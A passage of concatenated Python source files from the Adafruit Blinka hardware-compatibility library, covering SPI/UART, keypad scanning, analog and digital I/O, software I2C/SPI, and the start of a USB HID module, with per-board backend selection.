from adafruit_blinka.microcontroller.generic_linux.spi import SPI as _SPI
elif detector.board.pico_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import SPI_Pico as _SPI
elif detector.board.feather_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_Feather as _SPI,
)
elif detector.board.feather_can_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_Feather_CAN as _SPI,
)
elif detector.board.feather_epd_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_Feather_EPD as _SPI,
)
elif detector.board.feather_rfm_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_Feather_RFM as _SPI,
)
elif detector.board.itsybitsy_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_ItsyBitsy as _SPI,
)
elif detector.board.macropad_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_MacroPad as _SPI,
)
elif detector.board.kb2040_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_KB2040 as _SPI,
)
elif detector.board.qtpy_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import SPI_QTPY as _SPI
elif detector.chip.id == ap_chip.RP2040:
from adafruit_blinka.microcontroller.rp2040.spi import SPI as _SPI
elif detector.board.any_siemens_iot2000:
from adafruit_blinka.microcontroller.am65xx.spi import SPI as _SPI
from adafruit_blinka.microcontroller.am65xx.pin import Pin
elif detector.board.any_embedded_linux:
from adafruit_blinka.microcontroller.generic_linux.spi import SPI as _SPI
else:
from adafruit_blinka.microcontroller.generic_micropython.spi import (
SPI as _SPI,
)
if self._locked:
# TODO check if #init ignores MOSI=None rather than unsetting, to save _pinIds attribute
self._spi.init(
baudrate=baudrate,
polarity=polarity,
phase=phase,
bits=bits,
firstbit=_SPI.MSB,
)
else:
raise RuntimeError("First call try_lock()")
def deinit(self):
"""Deinitialization"""
self._spi = None
self._pinIds = None
@property
def frequency(self):
"""Return the baud rate if implemented"""
try:
return self._spi.frequency
except AttributeError as error:
raise NotImplementedError(
"Frequency attribute not implemented for this platform"
) from error
def write(self, buf, start=0, end=None):
"""Write to the SPI device"""
return self._spi.write(buf, start, end)
def readinto(self, buf, start=0, end=None, write_value=0):
"""Read from the SPI device into a buffer"""
return self._spi.readinto(buf, start, end, write_value=write_value)
def write_readinto(
self, buffer_out, buffer_in, out_start=0, out_end=None, in_start=0, in_end=None
):
"""Write to the SPI device and read from the SPI device into a buffer"""
return self._spi.write_readinto(
buffer_out, buffer_in, out_start, out_end, in_start, in_end
)
class UART(Lockable):
"""
Busio UART Class for CircuitPython Compatibility. Used
for MicroPython and a few other non-Linux boards.
"""
class Parity(Enum):
"""Parity Enumeration"""
pass # pylint: disable=unnecessary-pass
Parity.ODD = Parity()
Parity.EVEN = Parity()
def __init__(
self,
tx,
rx,
baudrate=9600,
bits=8,
parity=None,
stop=1,
timeout=1000,
receiver_buffer_size=64,
flow=None,
):
if detector.board.any_embedded_linux:
raise RuntimeError(
"busio.UART not supported on this platform. Please use pyserial instead."
)
if detector.board.binho_nova:
from adafruit_blinka.microcontroller.nova.uart import UART as _UART
elif detector.board.greatfet_one:
from adafruit_blinka.microcontroller.nxp_lpc4330.uart import UART as _UART
elif detector.chip.id == ap_chip.RP2040:
from adafruit_blinka.microcontroller.rp2040.uart import UART as _UART
else:
from machine import UART as _UART
from microcontroller.pin import uartPorts
self.baudrate = baudrate
if flow is not None: # default 0
raise NotImplementedError(
"Parameter '{}' unsupported on {}".format("flow", agnostic.board_id)
)
# translate parity flag for Micropython
if parity is UART.Parity.ODD:
parity = 1
elif parity is UART.Parity.EVEN:
parity = 0
elif parity is None:
pass
else:
raise ValueError("Invalid parity")
if detector.chip.id == ap_chip.RP2040:
self._uart = _UART(
tx,
rx,
baudrate=baudrate,
bits=bits,
parity=parity,
stop=stop,
)
else:
# check tx and rx have hardware support
for portId, portTx, portRx in uartPorts: #
if portTx == tx and portRx == rx:
self._uart = _UART(
portId,
baudrate,
bits=bits,
parity=parity,
stop=stop,
timeout=timeout,
read_buf_len=receiver_buffer_size,
)
break
else:
raise ValueError(
"No Hardware UART on (tx,rx)={}\nValid UART ports: {}".format(
(tx, rx), uartPorts
)
)
def deinit(self):
"""Deinitialization"""
if detector.board.binho_nova:
self._uart.deinit()
self._uart = None
def read(self, nbytes=None):
"""Read from the UART"""
return self._uart.read(nbytes)
def readinto(self, buf, nbytes=None):
"""Read from the UART into a buffer"""
return self._uart.readinto(buf, nbytes)
def readline(self):
"""Read a line of characters up to a newline character from the UART"""
return self._uart.readline()
def write(self, buf):
"""Write to the UART from a buffer"""
return self._uart.write(buf) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/busio.py | busio.py |
import time
import threading
from collections import deque
import digitalio
class Event:
"""A key transition event."""
def __init__(self, key_number=0, pressed=True):
"""
Create a key transition event, which reports a key-pressed or key-released transition.
:param int key_number: the key number
:param bool pressed: ``True`` if the key was pressed; ``False`` if it was released.
"""
self._key_number = key_number
self._pressed = pressed
@property
def key_number(self):
"""The key number."""
return self._key_number
@property
def pressed(self):
"""
``True`` if the event represents a key down (pressed) transition.
The opposite of `released`.
"""
return self._pressed
@property
def released(self):
"""
``True`` if the event represents a key up (released) transition.
The opposite of `pressed`.
"""
return not self._pressed
def __eq__(self, other):
"""
Two `Event` objects are equal if their `key_number`
and `pressed`/`released` values are equal.
"""
return self.key_number == other.key_number and self.pressed == other.pressed
def __hash__(self):
"""Returns a hash for the `Event`, so it can be used in dictionaries, etc.."""
return hash(self._key_number)
def __repr__(self):
"""Return a textual representation of the object"""
return "<Event: key_number {} {}>".format(
self.key_number, "pressed" if self._pressed else "released"
)
class _EventQueue:
"""
A queue of `Event` objects, filled by a `keypad` scanner such as `Keys` or `KeyMatrix`.
You cannot create an instance of `_EventQueue` directly. Each scanner creates an
instance when it is created.
"""
def __init__(self, max_events):
self._events = deque([], max_events)
self._overflowed = False
def get(self):
"""
Return the next key transition event. Return ``None`` if no events are pending.
Note that the queue size is limited; see ``max_events`` in the constructor of
a scanner such as `Keys` or `KeyMatrix`.
If a new event arrives when the queue is full, the event is discarded, and
`overflowed` is set to ``True``.
:return: the next queued key transition `Event`
:rtype: Optional[Event]
"""
if not self._events:
return None
return self._events.popleft()
def get_into(self, event):
"""Store the next key transition event in the supplied event, if available,
and return ``True``.
If there are no queued events, do not touch ``event`` and return ``False``.
The advantage of this method over ``get()`` is that it does not allocate storage.
Instead you can reuse an existing ``Event`` object.
Note that the queue size is limited; see ``max_events`` in the constructor of
a scanner such as `Keys` or `KeyMatrix`.
:return ``True`` if an event was available and stored, ``False`` if not.
:rtype: bool
"""
if not self._events:
return False
next_event = self._events.popleft()
# pylint: disable=protected-access
event._key_number = next_event._key_number
event._pressed = next_event._pressed
# pylint: enable=protected-access
return True
def clear(self):
"""
Clear any queued key transition events. Also sets `overflowed` to ``False``.
"""
self._events.clear()
self._overflowed = False
def __bool__(self):
"""``True`` if `len()` is greater than zero.
This is an easy way to check if the queue is empty.
"""
return len(self._events) > 0
def __len__(self):
"""Return the number of events currently in the queue. Used to implement ``len()``."""
return len(self._events)
@property
def overflowed(self):
"""
``True`` if an event could not be added to the event queue because it was full. (read-only)
Set to ``False`` by `clear()`.
"""
return self._overflowed
def keypad_eventqueue_record(self, key_number, current):
"""Record a new event"""
if len(self._events) == self._events.maxlen:
self._overflowed = True
else:
self._events.append(Event(key_number, current))
class _KeysBase:
def __init__(self, interval, max_events, scanning_function):
self._interval = interval
self._last_scan = time.monotonic()
self._events = _EventQueue(max_events)
self._scanning_function = scanning_function
self._scan_thread = threading.Thread(target=self._scanning_loop, daemon=True)
self._scan_thread.start()
@property
def events(self):
"""The EventQueue associated with this Keys object. (read-only)"""
return self._events
def deinit(self):
"""Stop scanning"""
if self._scan_thread.is_alive():
self._scan_thread.join()
def __enter__(self):
"""No-op used by Context Managers."""
return self
def __exit__(self, exception_type, exception_value, traceback):
"""
Automatically deinitializes when exiting a context. See
:ref:`lifetime-and-contextmanagers` for more info.
"""
self.deinit()
def _scanning_loop(self):
while True:
remaining_delay = self._interval - (time.monotonic() - self._last_scan)
if remaining_delay > 0:
time.sleep(remaining_delay)
self._last_scan = time.monotonic()
self._scanning_function()
class Keys(_KeysBase):
"""Manage a set of independent keys."""
def __init__(
self, pins, *, value_when_pressed, pull=True, interval=0.02, max_events=64
):
"""
Create a `Keys` object that will scan keys attached to the given sequence of pins.
Each key is independent and attached to its own pin.
An `EventQueue` is created when this object is created and is available in the
`events` attribute.
:param Sequence[microcontroller.Pin] pins: The pins attached to the keys.
The key numbers correspond to indices into this sequence.
:param bool value_when_pressed: ``True`` if the pin reads high when the key is pressed.
``False`` if the pin reads low (is grounded) when the key is pressed.
All the pins must be connected in the same way.
:param bool pull: ``True`` if an internal pull-up or pull-down should be
enabled on each pin. A pull-up will be used if ``value_when_pressed`` is ``False``;
a pull-down will be used if it is ``True``.
If an external pull is already provided for all the pins, you can set
``pull`` to ``False``.
However, enabling an internal pull when an external one is already present is not
a problem;
it simply uses slightly more current.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
self._digitalinouts = []
for pin in pins:
dio = digitalio.DigitalInOut(pin)
if pull:
dio.pull = (
digitalio.Pull.DOWN if value_when_pressed else digitalio.Pull.UP
)
self._digitalinouts.append(dio)
self._currently_pressed = [False] * len(pins)
self._previously_pressed = [False] * len(pins)
self._value_when_pressed = value_when_pressed
super().__init__(interval, max_events, self._keypad_keys_scan)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
for dio in self._digitalinouts:
dio.deinit()
def reset(self):
"""Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
self._currently_pressed = self._previously_pressed = [False] * self.key_count
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return len(self._digitalinouts)
def _keypad_keys_scan(self):
for key_number, dio in enumerate(self._digitalinouts):
self._previously_pressed[key_number] = self._currently_pressed[key_number]
current = dio.value == self._value_when_pressed
self._currently_pressed[key_number] = current
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
class KeyMatrix(_KeysBase):
"""Manage a 2D matrix of keys with row and column pins."""
# pylint: disable=too-many-arguments
def __init__(
self,
row_pins,
column_pins,
columns_to_anodes=True,
interval=0.02,
max_events=64,
):
"""
Create a `Keys` object that will scan the key matrix attached to the given row and
column pins.
There should not be any external pull-ups or pull-downs on the matrix:
``KeyMatrix`` enables internal pull-ups or pull-downs on the pins as necessary.
The keys are numbered sequentially from zero. A key number can be computed
by ``row * len(column_pins) + column``.
An `EventQueue` is created when this object is created and is available in the `events`
attribute.
:param Sequence[microcontroller.Pin] row_pins: The pins attached to the rows.
:param Sequence[microcontroller.Pin] column_pins: The pins attached to the colums.
:param bool columns_to_anodes: Default ``True``.
If the matrix uses diodes, the diode anodes are typically connected to the column pins,
and the cathodes should be connected to the row pins. If your diodes are reversed,
set ``columns_to_anodes`` to ``False``.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
self._row_digitalinouts = []
for row_pin in row_pins:
row_dio = digitalio.DigitalInOut(row_pin)
row_dio.switch_to_input(
pull=(digitalio.Pull.UP if columns_to_anodes else digitalio.Pull.DOWN)
)
self._row_digitalinouts.append(row_dio)
self._column_digitalinouts = []
for column_pin in column_pins:
col_dio = digitalio.DigitalInOut(column_pin)
col_dio.switch_to_input(
pull=(digitalio.Pull.UP if columns_to_anodes else digitalio.Pull.DOWN)
)
self._column_digitalinouts.append(col_dio)
self._currently_pressed = [False] * len(column_pins) * len(row_pins)
self._previously_pressed = [False] * len(column_pins) * len(row_pins)
self._columns_to_anodes = columns_to_anodes
super().__init__(interval, max_events, self._keypad_keymatrix_scan)
# pylint: enable=too-many-arguments
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return len(self._row_digitalinouts) * len(self._column_digitalinouts)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
for row_dio in self._row_digitalinouts:
row_dio.deinit()
for col_dio in self._column_digitalinouts:
col_dio.deinit()
def reset(self):
"""
Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
self._previously_pressed = self._currently_pressed = [False] * self.key_count
def _row_column_to_key_number(self, row, column):
return row * len(self._column_digitalinouts) + column
def _keypad_keymatrix_scan(self):
for row, row_dio in enumerate(self._row_digitalinouts):
row_dio.switch_to_output(
value=(not self._columns_to_anodes),
drive_mode=digitalio.DriveMode.PUSH_PULL,
)
for col, col_dio in enumerate(self._column_digitalinouts):
key_number = self._row_column_to_key_number(row, col)
self._previously_pressed[key_number] = self._currently_pressed[
key_number
]
current = col_dio.value != self._columns_to_anodes
self._currently_pressed[key_number] = current
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
row_dio.value = self._columns_to_anodes
row_dio.switch_to_input(
pull=(
digitalio.Pull.UP
if self._columns_to_anodes
else digitalio.Pull.DOWN
)
)
class ShiftRegisterKeys(_KeysBase):
"""Manage a set of keys attached to an incoming shift register."""
def __init__(
self,
*,
clock,
data,
latch,
value_to_latch=True,
key_count,
value_when_pressed,
interval=0.02,
max_events=64,
):
"""
Create a `Keys` object that will scan keys attached to a parallel-in serial-out
shift register like the 74HC165 or CD4021.
Note that you may chain shift registers to load in as many values as you need.
Key number 0 is the first (or more properly, the zero-th) bit read. In the
74HC165, this bit is labeled ``Q7``. Key number 1 will be the value of ``Q6``, etc.
An `EventQueue` is created when this object is created and is available in the
`events` attribute.
:param microcontroller.Pin clock: The shift register clock pin.
The shift register should clock on a low-to-high transition.
:param microcontroller.Pin data: the incoming shift register data pin
:param microcontroller.Pin latch:
Pin used to latch parallel data going into the shift register.
:param bool value_to_latch: Pin state to latch data being read.
``True`` if the data is latched when ``latch`` goes high
``False`` if the data is latched when ``latch goes low.
The default is ``True``, which is how the 74HC165 operates. The CD4021 latch is
the opposite. Once the data is latched, it will be shifted out by toggling the
clock pin.
:param int key_count: number of data lines to clock in
:param bool value_when_pressed: ``True`` if the pin reads high when the key is pressed.
``False`` if the pin reads low (is grounded) when the key is pressed.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
clock_dio = digitalio.DigitalInOut(clock)
clock_dio.switch_to_output(
value=False, drive_mode=digitalio.DriveMode.PUSH_PULL
)
self._clock = clock_dio
data_dio = digitalio.DigitalInOut(data)
data_dio.switch_to_input()
self._data = data_dio
latch_dio = digitalio.DigitalInOut(latch)
latch_dio.switch_to_output(value=True, drive_mode=digitalio.DriveMode.PUSH_PULL)
self._latch = latch_dio
self._value_to_latch = value_to_latch
self._currently_pressed = [False] * key_count
self._previously_pressed = [False] * key_count
self._value_when_pressed = value_when_pressed
self._key_count = key_count
super().__init__(interval, max_events, self._keypad_shiftregisterkeys_scan)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
self._clock.deinit()
self._data.deinit()
self._latch.deinit()
def reset(self):
"""
Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
self._currently_pressed = self._previously_pressed = [False] * self._key_count
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return self._key_count
@property
def events(self):
"""The ``EventQueue`` associated with this `Keys` object. (read-only)"""
return self._events
def _keypad_shiftregisterkeys_scan(self):
self._latch.value = self._value_to_latch
for key_number in range(self._key_count):
self._clock.value = False
self._previously_pressed[key_number] = self._currently_pressed[key_number]
current = self._data.value == self._value_when_pressed
self._currently_pressed[key_number] = current
self._clock.value = True
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
self._latch.value = not self._value_to_latch | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/keypad.py | keypad.py |
import sys
from adafruit_blinka.agnostic import detector
# pylint: disable=ungrouped-imports,wrong-import-position,unused-import
if detector.board.microchip_mcp2221:
from adafruit_blinka.microcontroller.mcp2221.analogio import AnalogIn
from adafruit_blinka.microcontroller.mcp2221.analogio import AnalogOut
elif detector.board.greatfet_one:
from adafruit_blinka.microcontroller.nxp_lpc4330.analogio import AnalogIn
from adafruit_blinka.microcontroller.nxp_lpc4330.analogio import AnalogOut
elif detector.board.any_siemens_simatic_iot2000:
from adafruit_blinka.microcontroller.am65xx.analogio import AnalogIn
from adafruit_blinka.microcontroller.am65xx.analogio import AnalogOut
elif detector.chip.RK3308:
from adafruit_blinka.microcontroller.generic_linux.sysfs_analogin import AnalogIn
elif detector.chip.RK3399:
from adafruit_blinka.microcontroller.generic_linux.sysfs_analogin import AnalogIn
elif detector.chip.RK3588:
from adafruit_blinka.microcontroller.generic_linux.sysfs_analogin import AnalogIn
elif detector.chip.RK3568:
from adafruit_blinka.microcontroller.generic_linux.sysfs_analogin import AnalogIn
elif detector.chip.RK3566:
from adafruit_blinka.microcontroller.generic_linux.sysfs_analogin import AnalogIn
elif detector.chip.IMX6ULL:
from adafruit_blinka.microcontroller.generic_linux.sysfs_analogin import AnalogIn
elif detector.chip.STM32MP157:
from adafruit_blinka.microcontroller.generic_linux.sysfs_analogin import AnalogIn
elif "sphinx" in sys.modules:
pass
elif detector.board.pico_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.analogio import (
AnalogIn_Pico as AnalogIn,
)
elif detector.board.feather_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.analogio import (
AnalogIn_Feather as AnalogIn,
)
elif detector.board.qtpy_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.analogio import (
AnalogIn_QTPY as AnalogIn,
)
elif detector.board.itsybitsy_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.analogio import (
AnalogIn_ItsyBitsy as AnalogIn,
)
else:
raise NotImplementedError("analogio not supported for this board.") | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/analogio.py | analogio.py |
from adafruit_blinka.agnostic import board_id, detector
# pylint: disable=ungrouped-imports,wrong-import-position
# By Chip Class
if detector.chip.BCM2XXX:
from adafruit_blinka.microcontroller.bcm283x.pin import Pin
elif detector.chip.AM33XX:
from adafruit_blinka.microcontroller.am335x.pin import Pin
elif detector.chip.AM65XX:
from adafruit_blinka.microcontroller.am65xx.pin import Pin
elif detector.chip.JH71x0:
from adafruit_blinka.microcontroller.starfive.JH71x0.pin import Pin
elif detector.chip.DRA74X:
from adafruit_blinka.microcontroller.dra74x.pin import Pin
elif detector.chip.SUN8I:
from adafruit_blinka.microcontroller.allwinner.h3.pin import Pin
elif detector.chip.SAMA5:
from adafruit_blinka.microcontroller.sama5.pin import Pin
elif detector.chip.T210:
from adafruit_blinka.microcontroller.tegra.t210.pin import Pin
elif detector.chip.T186:
from adafruit_blinka.microcontroller.tegra.t186.pin import Pin
elif detector.chip.T194:
from adafruit_blinka.microcontroller.tegra.t194.pin import Pin
elif detector.chip.T234:
from adafruit_blinka.microcontroller.tegra.t234.pin import Pin
elif detector.chip.S905:
from adafruit_blinka.microcontroller.amlogic.s905.pin import Pin
elif detector.chip.S905X:
from adafruit_blinka.microcontroller.amlogic.s905x.pin import Pin
elif detector.chip.S905X3:
from adafruit_blinka.microcontroller.amlogic.s905x3.pin import Pin
elif detector.chip.S905Y2:
from adafruit_blinka.microcontroller.amlogic.s905y2.pin import Pin
elif detector.chip.S922X:
from adafruit_blinka.microcontroller.amlogic.s922x.pin import Pin
elif detector.chip.A311D:
from adafruit_blinka.microcontroller.amlogic.a311d.pin import Pin
elif detector.chip.EXYNOS5422:
from adafruit_blinka.microcontroller.samsung.exynos5422.pin import Pin
elif detector.chip.APQ8016:
from adafruit_blinka.microcontroller.snapdragon.apq8016.pin import Pin
elif detector.chip.IMX8MX:
from adafruit_blinka.microcontroller.nxp_imx8m.pin import Pin
elif detector.chip.IMX6ULL:
from adafruit_blinka.microcontroller.nxp_imx6ull.pin import Pin
elif detector.chip.HFU540:
from adafruit_blinka.microcontroller.hfu540.pin import Pin
elif detector.chip.A64:
from adafruit_blinka.microcontroller.allwinner.a64.pin import Pin
elif detector.chip.A33:
from adafruit_blinka.microcontroller.allwinner.a33.pin import Pin
elif detector.chip.MIPS24KEC:
from adafruit_blinka.microcontroller.mips24kec.pin import Pin
elif detector.chip.RK3308:
from adafruit_blinka.microcontroller.rockchip.rk3308.pin import Pin
elif detector.chip.RK3399:
from adafruit_blinka.microcontroller.rockchip.rk3399.pin import Pin
elif detector.chip.RK3399_T:
from adafruit_blinka.microcontroller.rockchip.rk3399.pin import Pin
elif detector.chip.RK3588:
from adafruit_blinka.microcontroller.rockchip.rk3588.pin import Pin
elif detector.chip.RK3328:
from adafruit_blinka.microcontroller.rockchip.rk3328.pin import Pin
elif detector.chip.RK3566:
from adafruit_blinka.microcontroller.rockchip.rk3566.pin import Pin
elif detector.chip.RK3568:
from adafruit_blinka.microcontroller.rockchip.rk3568.pin import Pin
elif detector.chip.PENTIUM_N3710:
from adafruit_blinka.microcontroller.pentium.n3710.pin import Pin
elif detector.chip.ATOM_J4105:
from adafruit_blinka.microcontroller.pentium.j4105.pin import Pin
elif detector.chip.STM32MP157:
from adafruit_blinka.microcontroller.stm32.stm32mp157.pin import Pin
elif detector.chip.MT8167:
from adafruit_blinka.microcontroller.mt8167.pin import Pin
elif detector.chip.H3:
from adafruit_blinka.microcontroller.allwinner.h3.pin import Pin
elif detector.chip.H5:
from adafruit_blinka.microcontroller.allwinner.h5.pin import Pin
elif detector.chip.H6:
from adafruit_blinka.microcontroller.allwinner.h6.pin import Pin
elif detector.chip.H616:
from adafruit_blinka.microcontroller.allwinner.h616.pin import Pin
elif detector.chip.D1_RISCV:
from adafruit_blinka.microcontroller.allwinner.D1.pin import Pin
# Special Case Boards
elif detector.board.ftdi_ft232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.ft232h.pin import Pin
elif detector.board.ftdi_ft2232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.ft2232h.pin import Pin
elif detector.board.binho_nova:
from adafruit_blinka.microcontroller.nova.pin import Pin
elif detector.board.greatfet_one:
from adafruit_blinka.microcontroller.nxp_lpc4330.pin import Pin
elif detector.board.microchip_mcp2221:
from adafruit_blinka.microcontroller.mcp2221.pin import Pin
elif detector.chip.RP2040_U2IF:
from adafruit_blinka.microcontroller.rp2040_u2if.pin import Pin
# MicroPython Chips
elif detector.chip.STM32F405:
from machine import Pin
elif detector.chip.RP2040:
from machine import Pin
from adafruit_blinka import Enum, ContextManaged
class DriveMode(Enum):
"""Drive Mode Enumeration"""
PUSH_PULL = None
OPEN_DRAIN = None
DriveMode.PUSH_PULL = DriveMode()
DriveMode.OPEN_DRAIN = DriveMode()
class Direction(Enum):
"""Direction Enumeration"""
INPUT = None
OUTPUT = None
Direction.INPUT = Direction()
Direction.OUTPUT = Direction()
class Pull(Enum):
"""PullUp/PullDown Enumeration"""
UP = None
DOWN = None
# NONE=None
Pull.UP = Pull()
Pull.DOWN = Pull()
# Pull.NONE = Pull()
class DigitalInOut(ContextManaged):
"""DigitalInOut CircuitPython compatibility implementation"""
_pin = None
def __init__(self, pin):
self._pin = Pin(pin.id)
self.direction = Direction.INPUT
def switch_to_output(self, value=False, drive_mode=DriveMode.PUSH_PULL):
"""Switch the Digital Pin Mode to Output"""
self.direction = Direction.OUTPUT
self.value = value
self.drive_mode = drive_mode
def switch_to_input(self, pull=None):
"""Switch the Digital Pin Mode to Input"""
self.direction = Direction.INPUT
self.pull = pull
def deinit(self):
"""Deinitialize the Digital Pin"""
del self._pin
@property
def direction(self):
"""Get or Set the Digital Pin Direction"""
return self.__direction
@direction.setter
def direction(self, value):
self.__direction = value
if value is Direction.OUTPUT:
self._pin.init(mode=Pin.OUT)
self.value = False
self.drive_mode = DriveMode.PUSH_PULL
elif value is Direction.INPUT:
self._pin.init(mode=Pin.IN)
self.pull = None
else:
raise AttributeError("Not a Direction")
@property
def value(self):
"""The Digital Pin Value"""
return self._pin.value() == 1
@value.setter
def value(self, val):
if self.direction is Direction.OUTPUT:
self._pin.value(1 if val else 0)
else:
raise AttributeError("Not an output")
@property
def pull(self):
"""The pin pull direction"""
if self.direction is Direction.INPUT:
return self.__pull
raise AttributeError("Not an input")
@pull.setter
def pull(self, pul):
if self.direction is Direction.INPUT:
self.__pull = pul
if pul is Pull.UP:
self._pin.init(mode=Pin.IN, pull=Pin.PULL_UP)
elif pul is Pull.DOWN:
if hasattr(Pin, "PULL_DOWN"):
self._pin.init(mode=Pin.IN, pull=Pin.PULL_DOWN)
else:
raise NotImplementedError(
"{} unsupported on {}".format(Pull.DOWN, board_id)
)
elif pul is None:
self._pin.init(mode=Pin.IN, pull=None)
else:
raise AttributeError("Not a Pull")
else:
raise AttributeError("Not an input")
@property
def drive_mode(self):
"""The Digital Pin Drive Mode"""
if self.direction is Direction.OUTPUT:
return self.__drive_mode #
raise AttributeError("Not an output")
@drive_mode.setter
def drive_mode(self, mod):
self.__drive_mode = mod
if mod is DriveMode.OPEN_DRAIN:
self._pin.init(mode=Pin.OPEN_DRAIN)
elif mod is DriveMode.PUSH_PULL:
self._pin.init(mode=Pin.OUT) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/digitalio.py | digitalio.py |
import adafruit_platformdetect.constants.boards as ap_board
from adafruit_blinka import Lockable, agnostic
# pylint: disable=import-outside-toplevel,too-many-arguments
class I2C(Lockable):
"""Bitbang/Software I2C implementation"""
def __init__(self, scl, sda, frequency=400000):
# TODO: This one is a bit questionable:
if agnostic.board_id == ap_board.PYBOARD:
raise NotImplementedError("No software I2C on {}".format(agnostic.board_id))
if agnostic.detector.board.any_embedded_linux:
# TODO: Attempt to load this library automatically
raise NotImplementedError(
"For bitbangio on Linux, please use Adafruit_CircuitPython_BitbangIO"
)
self.init(scl, sda, frequency)
def init(self, scl, sda, frequency):
"""Initialization"""
from machine import Pin
from machine import I2C as _I2C
self.deinit()
id = ( # pylint: disable=redefined-builtin
-1
) # force bitbanging implementation - in future
# introspect platform if SDA/SCL matches hardware I2C
self._i2c = _I2C(id, Pin(scl.id), Pin(sda.id), freq=frequency)
def deinit(self):
"""Deinitialization"""
try:
del self._i2c
except AttributeError:
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.deinit()
def scan(self):
"""Scan for attached devices"""
return self._i2c.scan()
def readfrom_into(self, address, buffer, start=0, end=None):
"""Read from a device at specified address into a buffer"""
if start != 0 or end is not None:
if end is None:
end = len(buffer)
buffer = memoryview(buffer)[start:end]
stop = True # remove for efficiency later
return self._i2c.readfrom_into(address, buffer, stop)
def writeto(self, address, buffer, start=0, end=None, stop=True):
"""Write to a device at specified address from a buffer"""
if start != 0 or end is not None:
if end is None:
return self._i2c.writeto(address, memoryview(buffer)[start:], stop)
return self._i2c.writeto(address, memoryview(buffer)[start:end], stop)
return self._i2c.writeto(address, buffer, stop)
# TODO untested, as actually busio.SPI was on
# tasklist https://github.com/adafruit/Adafruit_Micropython_Blinka/issues/2 :(
class SPI(Lockable):
"""Bitbang/Software SPI implementation"""
def __init__(self, clock, MOSI=None, MISO=None):
if agnostic.detector.board.any_embedded_linux:
# TODO: Attempt to load this library automatically
raise NotImplementedError(
"For bitbangio on Linux, please use Adafruit_CircuitPython_BitbangIO"
)
from machine import SPI as _SPI
self._spi = _SPI(-1)
self._pins = (clock, MOSI, MISO)
def configure(self, baudrate=100000, polarity=0, phase=0, bits=8):
"""Update the configuration"""
from machine import Pin
from machine import SPI as _SPI
if self._locked:
# TODO verify if _spi obj 'caches' sck, mosi, miso to
# avoid storing in _attributeIds (duplicated in busio)
# i.e. #init ignores MOSI=None rather than unsetting
self._spi.init(
baudrate=baudrate,
polarity=polarity,
phase=phase,
bits=bits,
firstbit=_SPI.MSB,
sck=Pin(self._pins[0].id),
mosi=Pin(self._pins[1].id),
miso=Pin(self._pins[2].id),
)
else:
raise RuntimeError("First call try_lock()")
def write(self, buf):
"""Write to the SPI device"""
return self._spi.write(buf)
def readinto(self, buf):
"""Read from the SPI device into a buffer"""
return self.readinto(buf)
def write_readinto(self, buffer_out, buffer_in):
"""Write to the SPI device and read from the SPI device into a buffer"""
return self.write_readinto(buffer_out, buffer_in) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/bitbangio.py | bitbangio.py |
from typing import Sequence
from pathlib import Path
import os
import atexit
import sys
for module in ["dwc2", "libcomposite"]:
if Path("/proc/modules").read_text(encoding="utf-8").find(module) == -1:
raise Exception(
"%s module not present in your kernel. did you insmod it?" % module
)
this = sys.modules[__name__]
this.gadget_root = "/sys/kernel/config/usb_gadget/adafruit-blinka"
this.boot_device = 0
this.devices = []
class Device:
"""
HID Device specification: see
https://github.com/adafruit/circuitpython/blob/main/shared-bindings/usb_hid/Device.c
"""
def __init__(
self,
*,
descriptor: bytes,
usage_page: int,
usage: int,
report_ids: Sequence[int],
in_report_lengths: Sequence[int],
out_report_lengths: Sequence[int],
) -> None:
self.out_report_lengths = out_report_lengths
